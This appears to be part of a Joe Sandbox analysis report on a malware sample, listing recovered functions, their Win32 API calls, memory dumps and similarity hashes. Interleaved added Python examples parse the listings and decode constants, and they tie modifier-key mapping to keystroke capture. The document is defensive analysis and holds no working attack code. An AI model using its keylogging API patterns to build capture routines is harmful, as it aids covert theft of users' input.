                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1803633139-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
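The per-function listings in this part of the report (an "APIs" block of resolved imports with their call-site addresses, the memory dump the function was recovered from, and the "Similarity" identifiers) are what an analyst greps through to find the functions worth opening in a disassembler. The listing above and the one that follows share four call sites (0045564E, 0045565C, 0045566A, 00455678), which is visible only by comparing the "ref:" addresses by hand. The following Python is an added example, not part of this report or of Joe Sandbox's own tooling: it parses these blocks and cross-references call sites and API names. SAMPLE is a constructed excerpt of the three adjacent listings (the associated-dump and snapshot lines are dropped for brevity), and the bullet-list layout it expects is an assumption read off the rendered page, not a documented export format.

```python
"""Parse Joe Sandbox function listings ("APIs" / "Memory Dump Source" /
"Similarity" blocks) and cross-reference call sites between functions.
Added example; the layout handled here is assumed from the rendered report."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample: excerpt of three function listings from this report.
SAMPLE = """\
APIs
• ___set_flsgetvalue.LIBCMT ref: 0041418F
• __calloc_crt.LIBCMT ref: 0041419B
• __getptd.LIBCMT ref: 004141A8
• CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
• __dosmaperr.LIBCMT ref: 00414201
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• API String ID: 1803633139-0
APIs
• ImageList_Destroy.COMCTL32(?), ref: 004555E8
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API String ID: 3275902921-0
APIs
• SendMessageW.USER32 ref: 004554DF
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API String ID: 3691411573-0
"""

# "• Name.MODULE(args), ref: ADDR" with an optional "Part of subcall function X:" prefix.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
KV_RE = re.compile(r"•\s*(?P<key>[^:]+):\s*(?P<value>.*)")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                 # call-site address inside the analysed image
    args: Optional[str]
    parent: Optional[str]    # set for "Part of subcall function ..." lines


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    dump: Dict[str, str] = field(default_factory=dict)        # Memory Dump Source
    similarity: Dict[str, str] = field(default_factory=dict)  # Similarity identifiers

    def direct_calls(self) -> List[ApiCall]:
        return [a for a in self.apis if a.parent is None]

    def modules(self) -> Set[str]:
        return {a.module for a in self.apis}


def parse_report(text: str) -> List[FunctionEntry]:
    """Split the text into one FunctionEntry per "APIs" block."""
    entries: List[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(FunctionEntry())
            section = "apis"
            continue
        if line in ("Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"):
            section = line
            continue
        if not entries or not line.startswith("•"):
            continue
        if section == "apis":
            m = API_RE.match(line)
            if m:
                entries[-1].apis.append(
                    ApiCall(m["name"], m["module"], m["ref"], m["args"], m["parent"]))
        else:
            m = KV_RE.match(line)
            if m:
                target = entries[-1].similarity if section == "Similarity" else entries[-1].dump
                target[m["key"].strip()] = m["value"].strip()
    return entries


def shared_call_sites(entries: List[FunctionEntry]) -> Dict[str, Set[int]]:
    """Call-site addresses listed by more than one function (overlapping listings)."""
    sites: Dict[str, Set[int]] = {}
    for i, e in enumerate(entries):
        for a in e.direct_calls():
            sites.setdefault(a.ref, set()).add(i)
    return {ref: idx for ref, idx in sites.items() if len(idx) > 1}


def functions_calling(entries: List[FunctionEntry], wanted: Set[str]) -> Dict[str, Set[int]]:
    """Index of which function entries reference each API name of interest."""
    hits: Dict[str, Set[int]] = {}
    for i, e in enumerate(entries):
        for a in e.apis:
            if a.name in wanted:
                hits.setdefault(a.name, set()).add(i)
    return hits


if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for i, e in enumerate(parsed):
        print(i, e.similarity.get("API String ID"), sorted(e.modules()),
              [a.name for a in e.direct_calls()])
    print("shared call sites:", shared_call_sites(parsed))
    print("callers:", functions_calling(parsed, {"CreateThread", "SendMessageW"}))
```

Run against a full copy of the report's code-analysis section, `shared_call_sites` collapses the overlapping listings into one function to open, and `functions_calling` answers "which recovered function calls CreateThread" without reading every block.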
APIs
• SendMessageW.USER32 ref: 004554DF
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
• Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
• Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1814673581-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
• String ID:
• API String ID: 372113273-0
• Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
• Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
• Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
• Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
• Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
• Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
• Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
APIs
• GetDC.USER32(00000000), ref: 0044CBEF
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
• Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
• Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
• Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
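The two "APIs" blocks above are only useful to an analyst once the hex arguments are decoded: the six MapVirtualKeyW calls all pass uMapType 0 (MAPVK_VK_TO_VSC) for modifier keys (0x5B VK_LWIN, 0x10 VK_SHIFT, 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU), which is the kind of scan-code mapping a keystroke-capture routine needs and fits the report's "Installs a global keyboard hook" signature; the GetDeviceCaps indices 0x58/0x5A are LOGPIXELSX/LOGPIXELSY, and MulDiv with 0x9EC (2540, the number of HIMETRIC units per inch) is a HIMETRIC-to-pixel conversion typical of MFC/ATL library code, so that second function is most likely framework boilerplate rather than stealer logic. The following helper is an added example, not part of Joe Sandbox or of this report; it parses the report's API-trace line format and annotates those constants. The sample lines are copied from the blocks above; the function and class names are the example's own.

```python
"""Decode Win32 constants in Joe Sandbox 'APIs' trace lines (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One trace line: "Name.Module(arg,arg,...), ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR: " for calls made from a nested routine.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 virtual-key codes seen in the MapVirtualKeyW calls above.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
# MapVirtualKey uMapType values.
MAPVK_TYPES = {0: "MAPVK_VK_TO_VSC", 1: "MAPVK_VSC_TO_VK",
               2: "MAPVK_VK_TO_CHAR", 3: "MAPVK_VSC_TO_VK_EX"}
# GetDeviceCaps index values.
DEVCAPS_INDEX = {8: "HORZRES", 10: "VERTRES", 12: "BITSPIXEL",
                 88: "LOGPIXELSX", 90: "LOGPIXELSY"}
HIMETRIC_PER_INCH = 2540  # 0.01 mm units per inch; 0x9EC in the report


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed "?"
    ref: int
    parent: Optional[int]


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for non-API lines (headers, hashes)."""
    m = API_LINE.search(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    for a in m.group("args").split(","):
        a = a.strip()
        if a:
            args.append(None if a == "?" else int(a, 16))
    parent = int(m.group("parent"), 16) if m.group("parent") else None
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), parent)


def annotate(call: ApiCall) -> str:
    """Human-readable meaning of the constants in a call, or '' if none known."""
    a = call.args
    if call.name == "MapVirtualKeyW" and len(a) >= 2 and None not in a[:2]:
        vk = VK_NAMES.get(a[0], "VK_0x%02X" % a[0])
        map_type = MAPVK_TYPES.get(a[1], "uMapType %d" % a[1])
        return f"{vk} -> {map_type}"
    if call.name == "GetDeviceCaps" and len(a) >= 2 and a[1] is not None:
        return DEVCAPS_INDEX.get(a[1], "index %d" % a[1])
    if call.name == "MulDiv" and a and a[0] == HIMETRIC_PER_INCH:
        return "HIMETRIC_PER_INCH (HIMETRIC <-> pixel conversion)"
    if call.name == "WaitForSingleObject" and len(a) >= 2 and a[1] is not None:
        return f"timeout {a[1]} ms"
    return ""


def summarize(lines: List[str]) -> List[str]:
    """One annotated summary string per parseable API line."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        note = annotate(call)
        out.append(f"{call.name} @ {call.ref:08X}" + (f": {note}" if note else ""))
    return out


def mapped_virtual_keys(lines: List[str]) -> List[str]:
    """Sorted VK names passed to MapVirtualKeyW; all modifiers here."""
    keys = set()
    for line in lines:
        call = parse_api_line(line)
        if call and call.name == "MapVirtualKeyW" and call.args and call.args[0] is not None:
            keys.add(VK_NAMES.get(call.args[0], "VK_0x%02X" % call.args[0]))
    return sorted(keys)


# Sample input: lines copied from the two function blocks above.
SAMPLE_LINES = [
    "• MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F",
    "• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997",
    "• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2",
    "• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD",
    "• MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5",
    "• MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD",
    "• GetDC.USER32(00000000), ref: 0044CBEF",
    "• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00",
    "• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09",
    "• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29",
    "  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9",
]

if __name__ == "__main__":
    for s in summarize(SAMPLE_LINES):
        print(s)
    print("modifier keys mapped:", ", ".join(mapped_virtual_keys(SAMPLE_LINES)))
```

Feeding the whole "APIs" section of a report through `summarize` separates routines that touch keyboard state from display-metric boilerplate without opening the dump in IDA; the fuzzy hashes in each block can then be compared across samples to confirm which functions are shared library code.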
APIs
• InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
• EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
• InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
• LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
